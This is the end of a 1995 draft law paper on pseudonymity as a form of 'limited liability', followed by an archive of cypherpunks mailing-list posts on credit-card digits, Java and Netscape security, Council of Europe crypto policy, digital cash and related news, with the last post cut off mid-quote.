anonymously, it is, in effect, impossible for them to communicate
pseudonymously as well.  Analyzing the consequences of a "ban on
anonymity" in cyberspace needs to take more than the benefits and costs
of anonymous messaging into account; it needs to be evaluated in light
of the benefits and costs of pseudonymous communication as well,
considerations that have received less attention from those looking at
these questions. So the question "what is the best traceability
requirement to apply to electronic communication" needs to consider not
only the harms and benefits flowing from anonymous communication but
these additional considerations as well.

	  Because all communication in cyberspace is entirely
machine-mediated -- i.e., because the "identity" of the relevant actors
in a biological sense is necessarily at one remove from the
communication itself -- everyone acts "pseudonymously," at least in the
sense that you can only be identified by a stream of bits when you act
in cyberspace [NOTE 6].  The prospect for more creative uses of
pseudonymous action -- the ability for individuals to pool their
individual intellectual capital with great flexibility and with very
low start-up or transactions costs, into a wide range of new kinds of
actors and entities, each capable of accumulating reputational capital
-- is a profound and exciting feature of this environment.[NOTE 7]

	       The "limited liability" metaphor now becomes a bit
more useful.  Just as limited liability in the corporate context was
designed to encourage the pooling of physical and financial assets into
corporate entities, assuring investors that their personal assets would
not be placed at risk, so, too, should protection against traceability
(i.e., protection for pseudonymous action) encourage "investors" to
pool their intellectual capital into pseudonymous entities, assuring
those investors that only the reputation of the pseudonymous actor, and
not their own personal assets, are at risk when the entity acts.

     This approach probably answers none of the hard questions about
the proper scope of regulation; it may, hopefully, lead to a
consideration of those questions that need to be answered before any
regulatory actions are undertaken.  If there are benefits to be gained
from the actions of these entities -- if the pooling of intellectual
capital into entities leads to new and valuable forms of intellectual
undertakings (itself a question open to discussion) -- we should seek
to design our rules of limited liability to simultaneously induce
"investors" to form these new entities while minimizing the costs that
may be associated with their formation?  Analyses of corporate limited
liability are useful analogues for this inquiry; when should "piercing
the veil" of pseudonymity be permitted or required? Can we disaggregate
the various aspects of personal identity that should receive more, or
less, protection from disclosure?

************************************************

NOTES.

	  1.   Visiting Associate Professor of Law, Georgetown
University Law Center, and Co-director, Cyberspace Law Institute.
Email:  Postd at law.georgetown.edu or DPostn00 at counsel.com.  Permission
is hereby granted to freely copy and distribute this paper; please
retain the "Draft" designation as well as attribution to the author.

	  2.   I use "information" in the information-theoretic
sense, in which information is measured as a reduction in uncertainty;
that is, a message that contains information about the identity of the
sender is one that, by definition, lowers the recipient's uncertainty
concerning the identity of the sender.

	  3.   "Identity," of course, is not a static,
context-less piece of information, but is, rather, a complex cluster of
characteristics attributable to an individual, subsets of which may be
more or less relevant in particular contexts (and information about
which may be differentially transmitted in particular messages).
Consider the graffiti again -- even assuming that this may be an
"untraceable" message, in what sense is it an "anonymous" one?  The
reader may obtain a great deal of information relevant to (certain
aspects of) the originator's "identity" -- information about the
originator's political views, perhaps, or familiarity with certain
historical events.  On the other hand, the original message provides no
information (i.e., it is "anonymous") with regard to the originator's
state of domicile (or where the originator went to school, or how many
children the originator may have -- all attributes relevant, in other
contexts, to the question of the originator's "identity").

	  And while we ordinarily think of "identity" in the
context of individual biological persons, that is far too restrictive a
view.  Consider my receipt of an (unsigned) notice from the Department
of Motor Vehicles, or an (unsigned) advertising flyer from my local
McDonald's restaurant.  Each of these messages is "anonymous" in one
sense: I obtain virtually no information about the "identity" of the
(biologically-relevant) individual who typed the notice or otherwise
caused it to be transmitted to me (if indeed there is any such
person).  But it is hardly anonymous in another (and probably more
significant) sense: the letterhead clearly identifies the "identity" of
the more relevant actor (the DMV or McDonald's).  The relevant actor
here, i.e. the DMV or  McDonalds, has a reality unconnected with the
physical "identity" of any of its individual constituents (employees,
officers, etc.); indeed, a notice from the DMV that is mistakenly
placed on non-letterhead stationery (but that is signed by the typist)
surely has less reliable information about the originator's "identity"
than the reverse (i.e., an unsigned note placed on DMV letterhead).

	  4.   Traceability itself is highly context-dependent,
insofar as both the cost of obtaining additional identification
information, and the value of that information in reducing uncertainty
regarding identity, will vary, possibly greatly, from one situation to
another.  It may, for example, be relatively easy for a law enforcement
official to obtain information regarding the identity of the individual
who placed a particular phone call; the same information may be
prohibitively difficult for other individuals to obtain.  Traceability
is also affected by the (1) whether or not relevant identification
information exists in the hands of third parties (i.e., parties other
than the originator and recipient), (2) the third party's duty (or lack
of a duty) to keep the information secret, and (3) the ease with which
disclosure can be legally compelled (by process, subpoena, etc.).

     5.   Anonymity can thus be regarded as a subset of pseudonymity,
with the critical difference being, for my purposes at least, that
pseudonymity allows the accretion of reputational capital in the
pseudonym.

	  6.   This stream may have a high degree of traceability
-- if my electronic mail address is "Postd at law.georgetown.edu," for
example, there at least appears to be information allowing the message
to be traced to a real individual (though query, as always, how
reliable that information may be).  Or it may not -- the use of a
screen name on America Online, or, in the extreme, the use of anonymous
remailers.

	  7.   Examples: the Cancelmoose; the Cyberspace Law
Institute.

     8.   I use "regulation" in the broad sense, to include not only
State action but the "regulatory" activities of e.g., individual system
operators.

	  9.   Note, in this regard, that protecting the "limited
liability" features of pseudonymity does not necessarily mean that
harms imposed on third parties by pseudonymous entities must go
unredressed (as is the consequence of limited liability in the
corporate context); because reputational capital is not transferable,
i.e., is not useful for the purpose of compensating victims of harms
perpetrated by pseudonymous entities, redress can be achieved by
exposing individuals' financial assets, though not necessarily their
personal identities, to risk when the pseudonymous entity acts, and
there are various insurance and authentication/certification regimes
that I will discuss to accomplish this.






From Greg_Rose at sibelius.sydney.sterling.com  Wed Nov 15 18:44:52 1995
From: Greg_Rose at sibelius.sydney.sterling.com (Greg ROSE)
Date: Thu, 16 Nov 1995 10:44:52 +0800
Subject: Amex cards extra four digits
In-Reply-To: <9511160031.AA41675@paganini.sydney.sterling.com>
Message-ID: <9511160227.AA09304@paganini.sydney.sterling.com>



-----BEGIN PGP SIGNED MESSAGE-----

Oops, following up my own posting, it proves I
should have been more careful...

I wrote
  Wow, you learn something every day. I've never in
  my whole life (well, my American Express life,
  over 15 years) noticed those four digits. I've
  never been asked for them by anyone, or noticed
  them being written down, either. Exactly when and
  how are they used?

But when I reread it I thought it sounded
sarcastic. It isn't -- there really are an extra
four digits printed on both my Amex cards that I'd
never noticed before -- and my question is
serious.

Greg.

Greg Rose               INTERNET: greg_rose at sydney.sterling.com  
Sterling Software       VOICE:  +61-2-9975 4777    FAX:  +61-2-9975 2921
28 Rodborough Rd.       http://www.sydney.sterling.com:8080/~ggr
French's Forest         35 0A 79 7D 5E 21 8D 47  E3 53 75 66 AC FB D9 45
NSW 2086 Australia.     co-mod sci.crypt.research, USENIX Director.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i

iQCVAwUBMKqhTaRQkCwJ0+ZNAQGchQQAsmID1hHpIxJzjeXpkrrNxW4IWVoQwyel
2xb5VAoam37CPLj7ic5M+TqRh+FTBEwWItr3Uv18isv3+dYC7fKCvE7YCMBvENeO
xHzuNqoPiHCUnBUbFRP4U8/RO/GGdiPOo6ZlOnzOOmdzD2yDsWfPx6t6x0bVsFN+
63G/e6EgXzs=
=Xzwz
-----END PGP SIGNATURE-----





From ses at tipper.oit.unc.edu  Wed Nov 15 18:45:31 1995
From: ses at tipper.oit.unc.edu (Simon Spero)
Date: Thu, 16 Nov 1995 10:45:31 +0800
Subject: credit card conventional wisdom (fwd)
Message-ID: <Pine.SOL.3.91.951115182044.18955B-100000@chivalry>




Date: Wed, 15 Nov 1995 18:07:25 -0800
From: Tom Wills <twills at eit.COM>
To: Simon Spero <ses at tipper.oit.unc.edu>
Subject: Re: credit card conventional wisdom (fwd)

The printed digits above the embossed account number are the first four
digits of the BIN (on Visa cards) or ICA (on MasterCards). They are there
to discourage re-embossing of the card with another account number.

Original Message:

>
>Wow, you learn something every day. I've never in
>my whole life (well, my American Express life,
>over 15 years) noticed those four digits. I've
>never been asked for them by anyone, or noticed
>them being written down, either. Exactly when and
>how are they used?







From jsw at netscape.com  Wed Nov 15 18:58:55 1995
From: jsw at netscape.com (Jeff Weinstein)
Date: Thu, 16 Nov 1995 10:58:55 +0800
Subject: Netscape rewards are an insult
In-Reply-To: <199511151019.CAA18910@jobe.shell.portal.com>
Message-ID: <30AAA306.64CF@netscape.com>


Dr. Frederick B. Cohen wrote:
> On a closely related vein, Sun has announced that they are severely
> limiting some functions in HotJava - from Risks-17-45:

[ excerpts from Sun announcement deleted ]

> I had a rather lengthy discussion with a gentleman from Sun at the CSI
> conference last Tuesday night, and this announcement follows many of the
> things we discussed very closely.  This kind of consistency between what
> people say and what the company published is refreshing, and it restores
> my faith in Sun's desire to do things well.  Of course there are still
> some problems left unresolved:

[ more of Sun announcement deleted ]

> I do think that this response by Sun, regardless of the technical merits
> of the particulars, demonstrates a desire to improve protection and a
> willingness to listen.  My compliments for that.

All of these security measures are implemented by Netscape in the
current release.  Specifically, Netscape Navigator 2.0beta2
includes all the applet security precautions detailed in the recent
comp.lang.java posting.  Netscape has been shipping the fixed
applet security model for over a month(since 2.0Beta1), and
Netscape and Sun continue to cooperate and work closely on applet
security issues.

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw at netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.





From Greg_Rose at sibelius.sydney.sterling.com  Wed Nov 15 19:06:56 1995
From: Greg_Rose at sibelius.sydney.sterling.com (Greg ROSE)
Date: Thu, 16 Nov 1995 11:06:56 +0800
Subject: credit card conventional wisdom (fwd)
In-Reply-To: <Pine.SOL.3.91.951115182044.18955B-100000@chivalry>
Message-ID: <9511160242.AA41564@paganini.sydney.sterling.com>



-----BEGIN PGP SIGNED MESSAGE-----

  The printed digits above the embossed account number are the first four
  digits of the BIN (on Visa cards) or ICA (on MasterCards). They are there
  to discourage re-embossing of the card with another account number.

True for Visa cards, but false for the AMEX. On my
two Amex cards there is no obvious relationship
between the four digit number and the embossed
card number.

Greg.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i

iQCVAwUBMKqlKqRQkCwJ0+ZNAQEN5wP/Y1mwOl9/4nctt3M82d0Dy7B3u11+7PLF
eU7qTVh+Xe19SN1U+uzvpK6SU24zUfbAcLd6gMrxueNX5mD9u3dx8DhsQzL7w0Az
GcB9iHISV+WNN+7sIb2n3D6Me5Eo2cXoGQGAfNaCoqKAJmWLzJeFeL/lTKxUS0fs
NvZUtOexzOI=
=yB0t
-----END PGP SIGNATURE-----





From ses at tipper.oit.unc.edu  Wed Nov 15 19:09:14 1995
From: ses at tipper.oit.unc.edu (Simon Spero)
Date: Thu, 16 Nov 1995 11:09:14 +0800
Subject: credit card conventional wisdom (fwd)
In-Reply-To: <Pine.SOL.3.91.951115182044.18955B-100000@chivalry>
Message-ID: <Pine.SOL.3.91.951115184015.18971A-100000@chivalry>



Further info:

  The AMEX digits aren't part of the standard info- someone I spoke to 
who started off as a grey box programmer said that he thought they were 
just process control. 

  Card-present/Card-not-present can be determined from info on the 
magnetic stripe; for visa cards, this info is stored in a three-digit 
checksum at the end of the discretionary info.

Card Imprints taken with no online authorisation are typically charged a 
transaction fee of 3-6%: with authorisation, 1.5-3%.  ATM card 
transactions  are charged at around $0.10 per transaction.


Simon





From EALLENSMITH at ocelot.Rutgers.EDU  Wed Nov 15 19:21:46 1995
From: EALLENSMITH at ocelot.Rutgers.EDU (E. ALLEN SMITH)
Date: Thu, 16 Nov 1995 11:21:46 +0800
Subject: e$: Come aaaannnndddd Get it!
Message-ID: <01HXORFUEO5Y8WY0P1@mbcl.rutgers.edu>


From: rah at shipwright.com (Robert Hettinga)

Sameer's done it, I'm going to do it, and I'm hoping that everyone who
*can* do it *will*.

Lumpy though MTB may be, they're taking a risk that no one else in the
financial community would, and they deserve whatever support we can give
'em.

If they do it and it works, there will be others. Come on, people, let's
make it work.

Put your e$ where your mouth is, or at least on a hard drive somewhere...
-------------------
	I will as soon as someone comes up with a _fully_ private digital
cash system and starts using it for something. As I understand it, Chaum's
ecash system is not one (i.e., non-privacy to the sender and of amounts to the
bank). If I'm incorrect, please tell me and I'll set up an account with MTB
immediately (if there's a text-based interface).
	-Allen





From hallam at w3.org  Wed Nov 15 19:24:19 1995
From: hallam at w3.org (Phillip M. Hallam-Baker)
Date: Thu, 16 Nov 1995 11:24:19 +0800
Subject: COE Recommendation No. R (95) 13
Message-ID: <9511160302.AA17272@www18.w3.org>


This is that Council of Europe "Ban Crypto" paper. It is of course
nothing like what it is claimed to be 

http://www.privacy.org/pi/intl_orgs/coe/info_tech_1995.html

In particular:

6. The law should permit investigating authorities to avail themselves
of all necessary technical measures that enable the collection of traffic
data in the investigation of crimes. 

"COLLECTION" - not comprehension

8. Criminal procedure laws should be reviewed with a view to making
possible the interception of telecommunications and the collection of
traffic data in the investigation of serious offenses against the
confidentiality, integrity and availability of telecommunications or
computer systems. 

This is simply to fix the German data protection laws and similar, some 
of which might prevent a sysop monitoring a hacker on a system they were 
hacking.


I think the majority of the text is well thought out and very much in
line with what we would want. The piece on encryption is a cop out
to please the French and Dutch. Read it carefully and you will see
it says absolutely nothing.

We have been had again...


Rule number one of politics, always assume that the enemy are 
misrepresenting their case. Council of Europe declarations are almost 
always implemented because they say almost nothing. It is a very
clear statement of some concerns which it would be nice if the 
US authorities understood - separation of search and seizure.

This is not a trend in which Europe is following the US. We are
simply thinking about the effect of technology on law enforcement
rather than reacting to its effects.

Found this written up in cipher, well worth a visit.

http://www.itd.nrl.navy.mil/ITD/5540/ieee/cipher/


--
Phillip M. Hallam-Baker            Not speaking for anoyone else
hallam at w3.org http://www.w3.org/hypertext/WWW/People/hallam.html
Information Superhighway -----> Hi-ho! Yow! I'm surfing Arpanet!







From habs at warwick.com  Wed Nov 15 19:41:42 1995
From: habs at warwick.com (Harry S. Hawk)
Date: Thu, 16 Nov 1995 11:41:42 +0800
Subject: Java Security Class in Netscape (was: Netscape rewards are an insult)
In-Reply-To: <30AAA306.64CF@netscape.com>
Message-ID: <199511160324.WAA25357@cmyk.warwick.com>



Jeff wrote:
> All of these security measures are implemented by Netscape in the
> current release.  Specifically, Netscape Navigator 2.0beta2
> includes all the applet security precautions detailed in the recent
> comp.lang.java posting.  Netscape has been shipping the fixed
> applet security model for over a month(since 2.0Beta1), and
> Netscape and Sun continue to cooperate and work closely on applet
> security issues.

All of these are very conservative measures and they seem to be the
best approach for the present. They do remove some of the more
interesting features of Java. Sun commented to me in an interview that
"we would not see a more complex security model until they adding
encryption and digi-sig's, etc."

My question is, can a corporate user replace the security class in
Netscape. I understand that all the class libs are in an external
file. While a virus might exploit this... my reason for asking is for
corporate developers who are building "intra"net systems.. making some
tweaks to the security class would give them the flexibility they need.
Otherwise we have taken much of the fun out of Java. (for good
reasons).





From hallam at w3.org  Wed Nov 15 19:59:41 1995
From: hallam at w3.org (Phillip M. Hallam-Baker)
Date: Thu, 16 Nov 1995 11:59:41 +0800
Subject: THE FRONT PAGE
Message-ID: <9511160347.AA17470@www18.w3.org>


I've edited this down, for fair use reasons, you can get the idea... 

Worth subscribing to this paper BTW.


> The Electronic Telegraph  Thursday 16 November 1995  The Front Page
> 
>  [The Front Page]
> 
> 'Black Baron' computer virus writer jailed for 18 months
> 
> By Robert Uhlig, Technology Correspondent
> 
> Devils in disguise that preyed on computers
> 
>  [Image]  THE man who wrote computer viruses which could cause millions of
> 
> pounds of damage, was jailed for 18 months yesterday.
> 
> Christopher Pile, who called himself the Black Baron, not only spread his own
> viruses, Exeter Crown Court was told, but also distributed across the world his
> program which let other hackers disguise their own viruses.

> The viruses have made the "Black Baron" notorious among British companies.
> Microprose estimated it lost up to �500,000 and used more than 480 staff hours
> checking more than a million files. The computer firm Apricot had to shut down
> and check many of its machines. It found that 22 out of 60 had been infected by
> Pathogen.


-- 
Phillip M. Hallam-Baker            Not speaking for anoyone else
hallam at w3.org http://www.w3.org/hypertext/WWW/People/hallam.html
Information Superhighway -----> Hi-ho! Yow! I'm surfing Arpanet!







From byerr at netcom.com  Wed Nov 15 21:10:22 1995
From: byerr at netcom.com (greeeeeeaaaaaat*)
Date: Thu, 16 Nov 1995 13:10:22 +0800
Subject: Professional interview wanted for report
Message-ID: <199511160456.XAA28418@netcom22.netcom.com>


Hi.  I'm a freshman at the Thomas Jefferson High School for Science
and Technology in Fairfax County, Virginia.  I am writing a (general)
report on cryptography for school, and I was wondering if anyone on
this list that works with cryptography in their job would be able to
give me a short interview over email.  Thanks a lot!

-- 
Ben Byer      byerr at netcom.com     I am not a bushing
GCS d-- s: a--- C++ UL++++ P++ L++ E+ W+ N++ o K-- w-- !O M-- !V !PS
!PE Y+(++) PGP t+ 5 !X R tv(+) DI+ G e- h! r !y





From jirib at sweeney.cs.monash.edu.au  Wed Nov 15 21:59:41 1995
From: jirib at sweeney.cs.monash.edu.au (Jiri Baum)
Date: Thu, 16 Nov 1995 13:59:41 +0800
Subject: NSA, ITAR, NCSA and plug-in hooks.
In-Reply-To: <9511142220.AA13813@sulphur.osf.org>
Message-ID: <199511160546.QAA00358@sweeney.cs.monash.edu.au>


-----BEGIN PGP SIGNED MESSAGE-----

Hello Rich Salz <rsalz at osf.org>
  and rsalz at osf.org, ses at tipper.oit.unc.edu
  and cypherpunks at toad.com, owner-cypherpunks at toad.com,
  and s1113645 at tesla.cc.uottawa.ca

...
> >are specifically designed for the insertion of cryptographic materials, 
> >or is it the fact that they could be used to support cryptographic 
...
> Basically, generic buffer-manipulation is okay.  "Keyed compression"
> where you explicitly passed something called a key to a DLL routine
> would be looked on suspiciously.
...

Why would you call it a key?

How about compression "options"? The compression algorithm could
have a "speed" mode and a "size" mode. It could also have options
for file type etc...

Recipient id could be passed along to check which compression
method the recipient knows.

...
> An abstract set of open/modify/close
> routines (where open returned a pointer to opaque state, say a session
> key :) would be fine.
...

So what's the difference... apart from what it's called?


Jiri
- --
If you want an answer, please mail to <jirib at cs.monash.edu.au>.
On sweeney, I may delete without reading!
PGP 463A14D5 (but it's at home so it'll take a day or two)
PGP EF0607F9 (but it's at uni so don't rely on it too much)

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i

iQCVAwUBMKrQSyxV6mvvBgf5AQFUqAP/R3IGOey/1NbyyzTLYgRsrcbQtM1HHc73
PzXijxLJHvCjUTRaHS1feBRJv+dbwAMlH8yO+Q4DKuy5YCdv5f3kJz0Bsyejr8/C
R3JOPSH4nePOGR8rfTK1AUMPQIGn50NXIaNT0OLdVSGU3444W4xruXiqkLlzduBn
2UNLX7DNXls=
=wGpa
-----END PGP SIGNATURE-----





From combee at techwood.org  Wed Nov 15 23:02:58 1995
From: combee at techwood.org (Ben Combee)
Date: Thu, 16 Nov 1995 15:02:58 +0800
Subject: Need advice on video
Message-ID: <199511160651.AAA29375@matrix.eden.com>


Hello, fellow cypherpunks.  This is my first post here on the global
CP list, although I've been working with the just-reformed Austin
chapter for the last couple of months.

Us Austinites are working on a video for public access television
on cryptography.  We are looking at a one-hour format, similar to
a science program, that will introduce cryptography, its history,
the basic ideas of modern crypto, and what applications there are
for it today and in the future.

Now, this might turn into a series, but for now, we are concentrating
on the overview episode.

What I'm fishing for here are any suggestions for ways to present
some of this content in an interesting video setting.  We've already
decided on doing some algorithm animation, and maybe some simple
moving graphics illustrating the various protocols.  Any ideas you
might have would be appreciated.

BTW, once we finish this and show it locally, we are considering
doing some duplication to send out to interested bodies.  Do you
think there is demand for a good, clear intro to all this in video
form?

Thanks,
-- 
        eebmoC .L nimajneB | Benjamin L. Combee                (REVERSE) 
       gro.doowhcet at eebmoc | combee at techwood.org           (ENGINEERING) 
\eebmoc\ten.kay.www\\:ptth | http://www.yak.net/combee/        (RESERVE)





From fc at all.net  Thu Nov 16 16:09:54 1995
From: fc at all.net (Dr. Frederick B. Cohen)
Date: Thu, 16 Nov 95 16:09:54 PST
Subject: Java & Netscape security  [NOISE]
In-Reply-To: <9511161831.ZM14572@glacius.alias.com>
Message-ID: <9511170006.AA17075@all.net>


> Perhaps Dr. Fred fails to realise that some people *aren't* speaking
> for their entire company every time they write e-mail. [see fc.all.net--
> i always enjoy pronouncing that nearly phonetically]

I thought all Netscape and Sun communications come from their PR
departments.  You can't have it both ways.  Your position seems to be:

	If employees make statements that work out, it's OK.
	If their statements don't work out, you disclaim them.

This is baloney.  When you work for Netscape or Sun and speak about your
company's products, you are representing the company whether you
disclaim it or not.

...
> To have some slight cpunks relevance, I will weigh in on the side of
> `It's not X's responsibility to ensure that Y's software isn't broken.'
> {for all X, Y in {software developers}} Why? For the same reason that
> I'm not generally held accountable for, say, Gary Jeffer's opinions
> or Tim May's: because I don't have any control over them.

	So your claim is that Unix is perfectly secure for networking,
because without inetd, sendmail, ident daemon, HTTP daemons, syslogd,
and all those other add-on software pieces, if your users act perfectly
and nobody ever makes a mistake, you are safe from known attacks. 

	I think this is ridiculous.

	When sendmail has a bug, most Unix systems become insecure. 
When syslog has a bug, most Unix systems become insecure.  These are
commonly called Unix insecurities.

	When Postscript allows writing to files, most Web browsers
become insecure - including Netscape, including HotJava.  If the only
commonly available postscript programs are insecure, the products have
hooks designed to allow postscript to be used automatically to interpret
programs from over the net, and servers commonly provide information in
postscript format, the enabling technology (i.e., Netscape and Hot Java)
is responsible for the vulnerability.

	If it only worked under Unix, people would call it a Unix
vulnerability, but since it works under Windows and OS/2 and every other
system that runs Netscape or HotJava, it is a Netscape and HotJava
vulnerability.

	I would also call it a postscript vulnerability, EXCEPT that
HotJava and Netscape ALSO provide hooks to command interpreters and
other insecure software, so we can't just pin it on the add-ons.  The
common thread is the Web browser, and that's where the blame belongs. 
Not with the millions of users, not with the tens of add-ons, not with
the various operating environment, but with the one common thread, the
Web browser.


-- 
-> See: Info-Sec Heaven at URL http://all.net/
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236




From sameer at c2.org  Thu Nov 16 16:15:04 1995
From: sameer at c2.org (sameer)
Date: Thu, 16 Nov 95 16:15:04 PST
Subject: Need to get your shop setup before friday?
Message-ID: <199511170008.QAA29573@infinity.c2.org>


	If you need to get your shop setup before Friday, and don't
have the time yourself to figure out how to install the CGI things,
etc.  Community ConneXion can do it for you, at our standard CGI web
design rate. Call me at the number below, or page 510-321-1014.

-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:     510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org/ (or login as "guest")		sameer at c2.org





From wiltship at iccu6.ipswich.gil.com.au  Thu Nov 16 02:33:23 1995
From: wiltship at iccu6.ipswich.gil.com.au (PeterWiltshire)
Date: Thu, 16 Nov 1995 18:33:23 +0800
Subject: credit card conventional wisdom
Message-ID: <199511161019.VAA16813@iccu6.ipswich.gil.com.au>


-----BEGIN PGP SIGNED MESSAGE-----

Gidday Greg

You wrote..
>Most consumer-level transactions are based on a general sort of 
>trust-in-human-nature sort of policy, backed up by the knowledge that a single
>failed transaction (or even a constant low level of failed transactions, where
>failed == "didn't get paid but gave the stuff away") isn't likely to kill off
>a business or even make it unprofitable.

Failed transactions are more likely to affect consumer confidence than
trader confidence.  I have yet to find a site on the net where goods are
shipped before receiving payment, therefore the 'at risk' party is the
buyer. Cybertraders will need to establish a level of credibility and
reliability on a par with their terrestrial cousins.  Cyberbuyers will need
to be confident in their ability to call upon yet unwritten international
laws to gain a refund or replacement when goods and services don't arrive as
advertised.

BTW do you want to buy a really big rock way out in the middle of nowhere?  [:>)

cheers

Peter

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMKsP0uvjRao+WEx9AQGq5wP9EicYrEbW3wDoLZ8FcPSvp9b9qk3GhoQH
H7pmHq3OvXr++DZHZqqzL2whvz24BvEA4DQ0mwPa1Te9EtIn/VGqbdv2UO23iI9H
ysGX80T3wokORgKay157KC70aykgiafpHYb0t+hQxClN2FY/jTA5FiheGTaNERQc
UkhP+wOg7zY=
=qewX
-----END PGP SIGNATURE-----







                                             Flight to Quality
                                 Wiltshire Productions Pty Ltd
                              Brisbane, Queensland, Australia
               Intl Voice  61 7 3376 3535  Intl Fax  61 7 3279 4027
              Email wiltship at gil.com.au  PGP Key ID 3E584C7D
  PGP Fingerprint 01 03 FB F4 BE F8 2B F3 5D 84 6B 69 37 80 FE 10






From hallam at w3.org  Thu Nov 16 19:50:52 1995
From: hallam at w3.org (hallam at w3.org)
Date: Thu, 16 Nov 95 19:50:52 PST
Subject: COE Recommendation No. R (95) 13
In-Reply-To: <Pine.HPP.3.91.951117024147.26779A-100000@cor.sos.sll.se>
Message-ID: <9511170350.AA29590@zorch.w3.org>



>How about this:
>________________________________________________________________________
>9. Subject to legal privileges or protection, most legal systems permit
>investigating authorities to order persons to hand over objects under
>their control that are required to serve as evidence. In a parallel
>fashion, provisions should be made for the power to order persons to
>submit any specified data under their control in a computer system in the
>form required by the investigating authority.
>________________________________________________________________________

>Is this 'what we would want'? It clearly means that one can be ordered
>to reveal the password to encrypted data and punished by law if one
>refuses. Suppose they suspect you of being a child pornographer and
>get a court order to search your encrypted system. You know you are
>innocent. Is it acceptable to put you in jail for not giving them access
>to your encrypted, very personal diary (in which you describe in detail
>your sexual encounters with the wife of the Chief of Police)?

Well if you want to eliminate all search and seisure powers of the courts
then that is a valid point to make. The point of the directive though
is to point out to the legislatures that they have to consider their
position on this one.

I'm not particularly keen on the idea that we should hope that the 
legislatures let this type of change happen by default. They are not 
going to do that, they may let things slide but they then are more
likely to do something reactionary when they realise they have been
had. And that reaction is likely to be anal.


>_______________________________________________________________________
>14. Measures should be considered to minimise the negative effects of the
>use of cryptography on the investigation of criminal offenses, without
>affecting its legitimate use more than is strictly necessary.
>_______________________________________________________________________

>Is this really just a toothless statement to give to the French?

Parse it carefully, its implications depend heavily on the interpretation
of "legitimate use" and "strictly necessary". 

Point is that it is not a directive to implement a Euro-Clipper program
which is what various spin doctors were claiming. The deputy director of the
NSA tried to use it as evidence to support his claim that other countries
are following the US position.

Mind you I may be wrong about the French. Someone suggested today that
they would prefer there to be no debate on crypto because they don't
want people to find out what they are up to.


		Phill


	Phill




From rsalz at osf.org  Thu Nov 16 20:21:33 1995
From: rsalz at osf.org (Rich Salz)
Date: Thu, 16 Nov 95 20:21:33 PST
Subject: Java & Netscape security  [NOISE]
Message-ID: <9511170418.AA18604@sulphur.osf.org>


><plonk>! I'm so tired of listening to this no-researching,
...

Why do people some to insist on telling the list when the killfile
someone?  Overall, isn't that just adding to the crap one has to
sift through?
	/r$





From rah at shipwright.com  Thu Nov 16 04:29:25 1995
From: rah at shipwright.com (Robert Hettinga)
Date: Thu, 16 Nov 1995 20:29:25 +0800
Subject: e$: Come aaaannnndddd Get it!
Message-ID: <v02120d01acd0da4ef02b@[199.0.65.105]>


At 8:57 PM 11/15/95, E. ALLEN SMITH wrote:
>-------------------
>        I will as soon as someone comes up with a _fully_ private digital
>cash system and starts using it for something. As I understand it, Chaum's
>ecash system is not one (i.e., non-privacy to the sender and of amounts to the
>bank). If I'm incorrect, please tell me and I'll set up an account with MTB
>immediately (if there's a text-based interface).

Ahhh. Next year in Jeresalem...

Tell me, are you actually selling something on the net yet? How many
customers do you have?

Cheers,
Bob Hettinga

-----------------
Robert Hettinga (rah at shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA (617) 958-3971
"Reality is not optional." --Thomas Sowell
The e$ Home Page: http://www.webstuff.apple.com/~vinnie/Rah
>>>>Phree Phil: Email: zldf at clark.net  http://www.netresponse.com/zldf <<<<<







From charles at europages.com  Thu Nov 16 04:56:54 1995
From: charles at europages.com (charles at europages.com)
Date: Thu, 16 Nov 1995 20:56:54 +0800
Subject: unsuscribe
Message-ID: <9511161032.AA10705@europages.com>


unsuscribe









From Andrew_Barrett at checkfree.com  Thu Nov 16 06:04:48 1995
From: Andrew_Barrett at checkfree.com (Andrew Barrett/CheckFree Corporation)
Date: Thu, 16 Nov 1995 22:04:48 +0800
Subject: -No Subject-
Message-ID: <9511161654.AA0590@6thstreetcheckfree.com>


Over 2000 years ago, Nostradamus predicted that on Tuesday November 14, 1995, 
Phil would say:

><...>Or at least there is a requirement for the
>assistant to enter the extra four digits in certain cases. The precise
>nature of the circumstance when they are required to be card present I
>am not sure (in fact I would bet they vary).

I'm betting your bet is right. When you set up your persona/nym for use with 
the CheckFree wallet, the software does ask for those four, non-embossed 
numbers on the Amex card - which I had never really noticed 'til then. And I 
frequently pass the amex number on the phone for business stuff.

Just last week, I had flowers sent to some partners of ours that we had just 
completed a deal with (sorry...should have odered them over the net), and the 4 
"flat" numbers were not required.

Hmmmm ....






From anonymous-remailer at shell.portal.com  Thu Nov 16 06:15:05 1995
From: anonymous-remailer at shell.portal.com (anonymous-remailer at shell.portal.com)
Date: Thu, 16 Nov 1995 22:15:05 +0800
Subject: CSE gets flak on TV
Message-ID: <199511161400.GAA00778@jobe.shell.portal.com>


On Tue, 14 Nov 1995 s1113645 at tesla.cc.uottawa.ca wrote:

> For those who care, the Communications Security Establishment has been
> getting some flak for spying on Mex. during NAFTA talks and on Korea to
> help us sell Can. nuke reactors:
> (This rather mirrors the trouble their sister agency, the NSA, has been 
> getting into)
> (sorry the online newscasts were rather vague)

Hmm, actually the news tape is reading a little strange here in Canada.
Not AP, or REUTERS, but simply the Canadian Press newswire.

Let's see ... over the last couple of days, we've had one provincial
Premier resign over "BingoGate" -- kickbacks from bingo games, another
premier is under some pretty heavy fire for some insider trading in a
company he promoted in Hong Kong, (actually his wife got stock she never
had to pay for), while Canada in conjunction with the normally very
neutral Swiss have frozen accounts pertaining to about $20 million or so
in kickbacks from Airbus Industries to a "senior Canadian politician". 

And all these stories ... coincidentally ... broke back to back.

It's almost as though the country is disinfecting itself, or has taken 
one particularly powerful laxative.

But the CSE story is really, really smelly.  The worst of the whole lot. 

I think that there might be more to this than appears on the surface. 
Maybe filling in some details might help our friends on this list.

You listening, Perry???

              *             *            *


On Tue, 14 Nov 1995 s1113645 at tesla.cc.uottawa.ca wrote:

>    Electronic snooping part of the game
>    
>    
>    OTTAWA (CP)--Intelligence experts say it's no big secret that Canada's
